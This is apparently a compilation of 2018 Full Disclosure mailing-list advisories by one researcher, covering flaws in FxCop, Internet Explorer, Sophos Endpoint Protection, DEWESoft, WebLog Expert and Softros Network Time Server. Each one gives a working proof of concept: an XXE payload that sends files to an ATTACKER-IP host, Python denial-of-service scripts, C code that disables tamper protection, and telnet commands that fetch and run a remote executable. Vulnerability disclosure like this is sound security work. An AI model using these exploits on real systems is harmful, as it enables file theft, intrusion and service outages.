run after an SDK’s install (if even feasible) would just draw attention to the problem. Visual Studio (specifically, C++) ships a trimmed-down version of the Windows 7 SDK, but it does not include FxCop, and so is unaffected. In summary, newer versions of FxCop are unaffected and we will pull afflicted versions from availability." Exploit/POC: = 1) python -m SimpleHTTPServer 2) "POC.FxCop" http://ATTACKER-IP:8000/payload.dtd";> %dtd;]> &send; 3) "payload.dtd" http://ATTACKER-IP:8000?%file;'>"> %all; 4) Import or Open "POC.FxCop" file in FxCop Files get exfiltrated to attacker server. Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: March 15, 2018 Vendor opens MSRC Case 44322?: March 16, 2018 Vendor reproduces issue : April 6, 2018 Vendor decides to pull all download links instead of advisory or fix : April 9, 2018 May 9, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [** FIX CODE TYPO] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: ===www.microsoft.com Product: Internet Explorer (Windows 10) v11.371.16299.0 Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. Vulnerability Type: == Denial Of Service CVE Reference: == N/A Security Issue: A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself, if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser. Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :) Tested Windows 10 Stack Dump: == (2e8c.27e4): Access violation - code c005 (first/second chance not available) ntdll!NtWaitForMultipleObjects+0x14: 7ffa`be5f0e14 c3 ret 0:015> r rax=005b rbx=0003 rcx=0003 rdx=00cca6efd3a8 rsi= rdi=0003 rip=7ffabe5f0e14 rsp=00cca6efcfa8 rbp= r8= r9= r10= r11=0246 r12=0010 r13=00cca6efd3a8 r14= r15= iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!NtWaitForMultipleObjects+0x14: 7ffa`be5f0e14 c3 ret CONTEXT: (.ecxr) rax= rbx=01fd4a2ec9d8 rcx= rdx=7ffabb499398 rsi=01fd4a5b0ce0 rdi= rip=7ffabb7fc646 rsp=00cca6efe4f8 rbp=00cca6efe600 r8= r9=8000 r10=7ffabb499398 r11= r12= r13=7ffabb48d060 r14=0002 r15=0001 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 KERNELBASE!StrCmpICW+0x6: 7ffa`bb7fc646 450fb70bmovzx r9d,word ptr [r11] ds:`= Resetting default scope FAULTING_IP: KERNELBASE!StrCmpICW+6 7ffa`bb7fc646 450fb70bmovzx r9d,word ptr [r11] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 7ffabb7fc646 (KERNELBASE!StrCmpICW+0x0006) ExceptionCode: c005 (Access violation) ExceptionFlags: NumberParameters: 2 Parameter[0]: Parameter[1]: Attempt to read from address DEFAULT_BUCKET_ID: NULL_POINTER_READ PROCESS_NAME: iexplore.exe POC video URL: ==https://vimeo.com/265691256/ Exploit/POC: 1) Run below python script to create "IE-Win10-Crasha.html" 2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10 payload=('\n'+ 'MSIE v11.371.16299 Denial Of Service by hyp3rlinx \n'+ 'crashy ware shee\n'+ '\n'+ 'Tested successfully on Windows 10\n'+ '\n' 'function doit(){\n'+ 'document.getElementById("hate").click();\n'+ 'alert("DOH!");\n'+ '}\n'+ 'setInterval("doit()", 2000)\n'+ '') file=open("IE-Win10-Crasha.html","w") file.write(payload) file.close() print 'MS InternetExplorer (Win 10) ' print 'Denial Of Service File Created.' print 'hyp3rlinx' Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: April 18, 2018 vendor closes thread : April 19, 2018 April 20, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or
[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: ===www.microsoft.com Product: Internet Explorer (Windows 10) v11.371.16299.0 Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. Vulnerability Type: == Denial Of Service CVE Reference: == N/A Security Issue: A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself, if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser. Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :) Tested Windows 10 Stack Dump: == (2e8c.27e4): Access violation - code c005 (first/second chance not available) ntdll!NtWaitForMultipleObjects+0x14: 7ffa`be5f0e14 c3 ret 0:015> r rax=005b rbx=0003 rcx=0003 rdx=00cca6efd3a8 rsi= rdi=0003 rip=7ffabe5f0e14 rsp=00cca6efcfa8 rbp= r8= r9= r10= r11=0246 r12=0010 r13=00cca6efd3a8 r14= r15= iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!NtWaitForMultipleObjects+0x14: 7ffa`be5f0e14 c3 ret CONTEXT: (.ecxr) rax= rbx=01fd4a2ec9d8 rcx= rdx=7ffabb499398 rsi=01fd4a5b0ce0 rdi= rip=7ffabb7fc646 rsp=00cca6efe4f8 rbp=00cca6efe600 r8= r9=8000 r10=7ffabb499398 r11= r12= r13=7ffabb48d060 r14=0002 r15=0001 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 KERNELBASE!StrCmpICW+0x6: 7ffa`bb7fc646 450fb70bmovzx r9d,word ptr [r11] ds:`= Resetting default scope FAULTING_IP: KERNELBASE!StrCmpICW+6 7ffa`bb7fc646 450fb70bmovzx r9d,word ptr [r11] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 7ffabb7fc646 (KERNELBASE!StrCmpICW+0x0006) ExceptionCode: c005 (Access violation) ExceptionFlags: NumberParameters: 2 Parameter[0]: Parameter[1]: Attempt to read from address DEFAULT_BUCKET_ID: NULL_POINTER_READ PROCESS_NAME: iexplore.exe POC video URL: ==https://vimeo.com/265691256/ Exploit/POC: 1) Run below python script to create "IE-Win10-Crasha.html" 2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10 payload=('\n'+ 'MSIE v11.371.16299 Denial Of Service by hyp3rlinx \n'+ 'crashy ware shee\n'+ '\n'+ 'Tested successfully on Windows 10\n'+ '\n' 'function doit(){\n'+ 'document.getElementById("hate").click();\n' 'alert("DOH!");\n'+ 'obj.click();\n'+ 'obj.click();\n'+ '}\n'+ 'setInterval("doit()", 2000)\n'+ '') file=open("IE-Win10-Crasha.html","w") file.write(payload) file.close() print 'MS InternetExplorer (Win 10) ' print 'Denial Of Service File Created.' print 'hyp3rlinx' Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: April 18, 2018 vendor closes thread : April 19, 2018 April 20, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security r
Re: [FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass
should have included more details for this report, no, you need be admin. I believe the enhanced tamper protection safeguards the services even in safe mode among other things like uninstalling etc... On Wed, Apr 4, 2018 at 3:48 AM, Buherátor wrote: > The affected key under HKLM is writable by regular users? A Get-ACL[1] > output would be appreciated! > > And why do you put a batch script inside C code? o.O > > [1] https://docs.microsoft.com/en-us/powershell/module/ > microsoft.powershell.security/get-acl?view=powershell-6 > > Buherátor - @buherator > PGP: 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855 > > > 2018-04-04 6:04 GMT+02:00 hyp3rlinx : > > [+] Credits: John Page (aka hyp3rlinx) > > [+] Website: hyp3rlinx.altervista.org > > [+] Source: > > http://hyp3rlinx.altervista.org/advisories/SOPHOS- > ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt > > [+] ISR: Apparition Security > > > > > > > > Vendor: > > = > > www.sophos.com > > > > > > > > Product: > > === > > Sophos Endpoint Protection v10.7 > > > > Sophos Endpoint Protection helps secure your workstation by adding > > prevention, detection, and response technology on top of your operating > > system. > > Sophos Endpoint Protection is designed for workstations running Windows > and > > macOS. It adds exploit technique mitigations, CryptoGuard > anti-ransomware, > > anti-malware, web security, malicious traffic detection, and deep system > > cleanup. > > > > > > > > Vulnerability Type: > > === > > Tamper Protection Bypass > > > > > > CVE Reference: > > == > > CVE-2018-4863 > > > > > > Security Issue: > > > > Sophos Endpoint Protection offers an enhanced tamper protection mechanism > > disallowing changes to be made to the Windows registry > > by creating and setting a special registry key "SEDEnabled" as follows: > > > > HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint > > Defense\TamperProtection\Config > > Create the following registry key: > > "SEDEnabled"=dword:0001" > > > > From "https://community.sophos.com/kb/en-us/124376"; documentation: > > "You must enable the basic Tamper Protection feature on an endpoint in > > order to use the Enhanced Tamper Protection" > > > > However, this protection mechanism can be bypassed by deleting the > > following registry key as it is not sufficiently protected. > > "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos > Endpoint > > Defense\" > > > > By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper > > Protection" once the system has been rebooted. > > Attackers can then create arbitrary registry keys or edit keys and > settings > > under the protected "tamper" protection config key. > > The issue undermines the integrity of the endpoint protection as deleting > > this key stops the tamper protect driver from loading. > > > > > > SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed > > customers customers are unaffected. > > All SAV OPM Preview subscribers have had the fix since 2018-03-01. > > > > > > > > Exploit/POC: > > = > > Compile the below malicious POC "C" code and run on target, PC will > reboot > > then we pwn. > > > > gcc -o sophos-poc.exe sophos-poc.c > > > > "sophos-poc.c" > > > > /***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS > > Even with "SEDEnabled"=dword:0001" set in registry to prevent > tampering > > https://community.sophos.com/kb/en-us/124376 > > By hyp3rlinx **/ > > > > int main(void){ > > system("reg delete > > \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos > Endpoint > > Defense\" /f"); > > system("shutdown -t 0 -r -f"); > > return 0; > > } > > > > > > > > Network Access: > > === > > Local > > > > > > > > Severity: > > = > > High > > > > > > > > Disclosure Timeline: > > = > > Vendor Notification: December 4, 2017 > > Vendor Acknowledgement: December 12, 2017 > > Vendor release fixes: March 1, 2018 > > Vendor request additional time before di
[FD] [FIXED TYPO **] CVE-2018-9233 Sophos Endpoint Protection Control Panel v10.7 / Insecure Crypto
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt [+] ISR: Apparition Security Vendor: == www.sophos.com Product: === Sophos Endpoint Protection - Control Panel v10.7 Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, anti-malware, web security, malicious traffic detection, and deep system cleanup. Vulnerability Type: === Insecure Crypto CVE Reference: == CVE-2018-9233 Security Issue: Sophos endpoint protection control panel authentication uses weak unsalted unicoded cryptographic hash (SHA1) function, not using salt allows attackers that gain access to hash ability to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow for changing of settings, whitelist or unquarantine files. Password and config for Sophos endpoint protection control panel is stored here: C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml e.g. SHA1 (Unicode) encoding non salted pass = abc123 true689307D2FC53AF0FB941BC1BB42737CE4F3EF540 Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can verify. C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));" 689307d2fc53af0fb941bc1bb42737ce4f3ef540 Network Access: === Local Severity: = Low Disclosure Timeline: = Vendor Notification: December 4, 2017 Vendor Acknowledgement: December 12, 2017 Vendor request additional time before disclosing. additional time has passed. April 4, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-9233 Sophos Endpoint Protection Control Panel v10.7 / Insecure Crypto
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt [+] ISR: Apparition Security Vendor: == www.sophos.com Product: === Sophos Endpoint Protection - Control Panel v10.7 Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, anti-malware, web security, malicious traffic detection, and deep system cleanup. Vulnerability Type: === Insecure Crypto CVE Reference: == CVE-2018-9233 Security Issue: Sophos endpoint protection control panel authentication uses weak unsalted unicoded cryptographic hash (SHA1) function, not using salt allows attackers that gain access to hash ability to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow for changing of settings, whitelist or unquarantine files. Password and config for Sophos endpoint protection control panel is stored here: C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml e.g. SHA1 (Unicode) encoding non salted pass = abc123 true689307D2FC53AF0FB941BC1BB42737CE4F3EF540 Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can verify. C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));" 689307d2fc53af0fb941bc1bb42737ce4f3ef540 Network Access: === Local Severity: = Low Disclosure Timeline: = Vendor Notification: December 4, 2017 Vendor Acknowledgement: December 12, 2017 Vendor release fixes: March 1, 2018 Vendor request additional time before disclosing. additional time has passed. April 4, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt [+] ISR: Apparition Security Vendor: = www.sophos.com Product: === Sophos Endpoint Protection v10.7 Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, anti-malware, web security, malicious traffic detection, and deep system cleanup. Vulnerability Type: === Tamper Protection Bypass CVE Reference: == CVE-2018-4863 Security Issue: Sophos Endpoint Protection offers an enhanced tamper protection mechanism disallowing changes to be made to the Windows registry by creating and setting a special registry key "SEDEnabled" as follows: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config Create the following registry key: "SEDEnabled"=dword:0001" >From "https://community.sophos.com/kb/en-us/124376"; documentation: "You must enable the basic Tamper Protection feature on an endpoint in order to use the Enhanced Tamper Protection" However, this protection mechanism can be bypassed by deleting the following registry key as it is not sufficiently protected. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\" By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper Protection" once the system has been rebooted. Attackers can then create arbitrary registry keys or edit keys and settings under the protected "tamper" protection config key. The issue undermines the integrity of the endpoint protection as deleting this key stops the tamper protect driver from loading. SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed customers customers are unaffected. All SAV OPM Preview subscribers have had the fix since 2018-03-01. Exploit/POC: = Compile the below malicious POC "C" code and run on target, PC will reboot then we pwn. gcc -o sophos-poc.exe sophos-poc.c "sophos-poc.c" /***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS Even with "SEDEnabled"=dword:0001" set in registry to prevent tampering https://community.sophos.com/kb/en-us/124376 By hyp3rlinx **/ int main(void){ system("reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\" /f"); system("shutdown -t 0 -r -f"); return 0; } Network Access: === Local Severity: = High Disclosure Timeline: = Vendor Notification: December 4, 2017 Vendor Acknowledgement: December 12, 2017 Vendor release fixes: March 1, 2018 Vendor request additional time before disclosing. additional time has passed. April 4, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt [+] ISR: Apparition Security Vendor: = www.dewesoft.com Product: === DEWESoft X3 SP1 (64-bit) installer - X3 DEWESoft_FULL_X3_SP1_64BIT.exe Vulnerability Type: === Remote Internal Command Access CVE Reference: == CVE-2018-7756 Security Issue: The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run a "SETFIREWALL Off" command. The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install. Internal commands used by "RunExeFile.exe" for which I could not find any documentation. RUN RUNEX GETFIREWALL SETFIREWALL Off KILL USERNAME SHUTDOWN SENDKEYS LIST DWPIPE Exploit/POC: = TELNET x.x.x.x 1999 RUN calc.exe OR Launch the victims browser and send them to website for a drive-by download etc. TELNET x.x.x.x 1999 RUN http://ATTACKER-IP/DOOM.exe Then from the TELNET session execute it from Downloads directory. runexe c:\Users\victim\Downloads\DOOM.exe Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: February 9, 2018 Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018 Inform vendor of disclosure timeline : February 19, 2018 No further replys, update or addressing of the issue by vendor. Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018 March 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WebLog Expert Web Server Enterprise v9.4 / Remote Denial Of Service CVE-2018-7582
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt [+] ISR: Apparition Security Vendor: === www.weblogexpert.com Product: = WebLog Expert Web Server Enterprise v9.4 WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts. Vulnerability Type: === Denial Of Service CVE Reference: == CVE-2018-7582 Security Issue: WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991. (e7c.1750): CLR exception - code e0434352 (first/second chance not available) eax= ebx=06d1d098 ecx=0005 edx= esi=0002 edi= eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!NtWaitForMultipleObjects+0x15: 778d016d 83c404 add esp,4 Exploit/POC: = import socket print 'Weblog Expert Server / Denial Of Service' print 'hyp3rlinx' IP='Weblog Expert Server IP' PORT=9991 PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n' s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((IP,PORT)) s.send(PAYLOAD) s.close() Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: February 3, 2018 Second attempt : February 17, 2018 March 7, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WebLog Expert Web Server Enterprise v9.4 / Authentication Bypass CVE-2018-7581
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt [+] ISR: Apparition Security Vendor: www.weblogexpert.com Product: WebLog Expert Web Server Enterprise v9.4 WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts. Vulnerability Type: === Authentication Bypass CVE Reference: == CVE-2018-7581 Security Issue: The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4 has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin. A standard non Windows Administrator user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer" set to a cleartext password and login as admin. e.g. C:\ProgramData\WebLog Expert\WebServer>cacls * | more C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C BUILTIN\Administrators:(ID)C NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F Exploit/POC: = Login as a 'Standard' Windows user Comment out the Admin hashed password using ';' then add any cleartext password as follows. [User:admin] Password=1234 ;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0 bAllProfiles=1 Now login in as Admin! :) Network Access: === Local Severity: = Medium Disclosure Timeline: = Vendor Notification: March 1, 2018 No replies from previous attempts March 7, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Softros Network Time System Server v2.3.4 / Denial Of Service CVE-2018-7658
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt [+] ISR: Apparition Security Vendor: = www.softros.com https://nts.softros.com/downloads/ Product: === Network Time System Server v2.3.4 Both x86/x64 versions Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment establishing an interconnected time synchronization system for each and every machine and device on the company network. Vulnerability Type: === Denial Of Service CVE Reference: == CVE-2018-7658 Security Issue: Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization could then potentially be impacted. Stack dump: ''' eax=0320119a ebx=000b ecx=00ff edx= esi=03167040 edi=0050b328 eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010297 NTSServerSvc+0x69a5: 004069a5 880amov byte ptr [edx],cl ds:0023:=?? Resetting default scope FAULTING_IP: NTSServerSvc+69a5 004069a5 880amov byte ptr [edx],cl EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 004069a5 (NTSServerSvc+0x69a5) ExceptionCode: c005 (Access violation) ''' Exploit/POC: = import socket #Network Time System (Server) NTSServerSvc.exe v2.3.4 #Softros Systems #NTS Server service for time synchronization over network print 'Network Time Server 11 byte Denial Of Service' print 'by hyp3rlinx' HOST=raw_input('Network Time Server IP') PORT=7001 payload='A'*11 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((HOST,PORT)) s.send(payload) s.close() Network Access: === Remote Severity: = Medium Disclosure Timeline: = Vendor Notification: February 10, 2018 Second attempt : February 24, 2018 Request CVE, assigned by Mitre : March 3, 2018 March 5, 2018: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or 